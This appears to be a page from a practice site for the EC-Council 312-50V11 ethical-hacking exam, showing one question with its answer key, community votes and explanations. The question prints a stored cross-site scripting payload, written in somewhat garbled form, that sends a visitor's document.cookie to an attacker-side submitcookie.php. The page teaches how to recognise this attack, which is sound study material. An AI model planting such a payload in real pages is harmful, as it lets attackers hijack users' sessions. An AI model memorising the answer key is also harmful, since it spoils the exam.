nerdexam
EC-Council

312-50V11 · Question #816

Judy created a forum, one day. she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden be

The correct answer is D. This php file silently executes the code and grabs the users session cookie and session ID.. The injected script is a stored XSS payload that silently exfiltrates the victim's session cookie by encoding it into an image request URL sent to the attacker's server.

Hacking Web Applications

Question

Judy created a forum, one day. she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden behind those images:

<script> document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+ escape(document.cookie)+ " />); </script> What issue occurred for the users who clicked on the image?

Options

  • AThe code inject a new cookie to the browser.
  • BThe code redirects the user to another site.
  • CThe code is a virus that is attempting to gather the users username and password.
  • DThis php file silently executes the code and grabs the users session cookie and session ID.

How the community answered

(52 responses)
  • A
    13% (7)
  • B
    8% (4)
  • C
    4% (2)
  • D
    75% (39)

Why each option

The injected script is a stored XSS payload that silently exfiltrates the victim's session cookie by encoding it into an image request URL sent to the attacker's server.

AThe code inject a new cookie to the browser.

The code reads and transmits the existing document.cookie value rather than writing or injecting any new cookie into the browser.

BThe code redirects the user to another site.

The code does not redirect the user - it only sends cookie data as a query string parameter embedded in an image tag src attribute.

CThe code is a virus that is attempting to gather the users username and password.

The script is not a virus and does not target username or password fields; it specifically harvests session cookies stored in the browser's document.cookie.

DThis php file silently executes the code and grabs the users session cookie and session ID.Correct

The script uses document.cookie to read the victim's session cookie and session ID, then appends them as a URL parameter in an image src pointing to the attacker's submitcookie.php script, which logs the stolen data server-side. This is a classic stored XSS cookie-theft technique that executes silently when the image loads in the victim's browser. The attacker can then use the captured session token to hijack the victim's authenticated session without needing their credentials.

Concept tested: Stored XSS session cookie theft via image tag

Source: https://owasp.org/www-community/attacks/xss/

Topics

#XSS#session cookie theft#cross-site scripting#JavaScript injection

Community Discussion

No community discussion yet for this question.

Full 312-50V11 Practice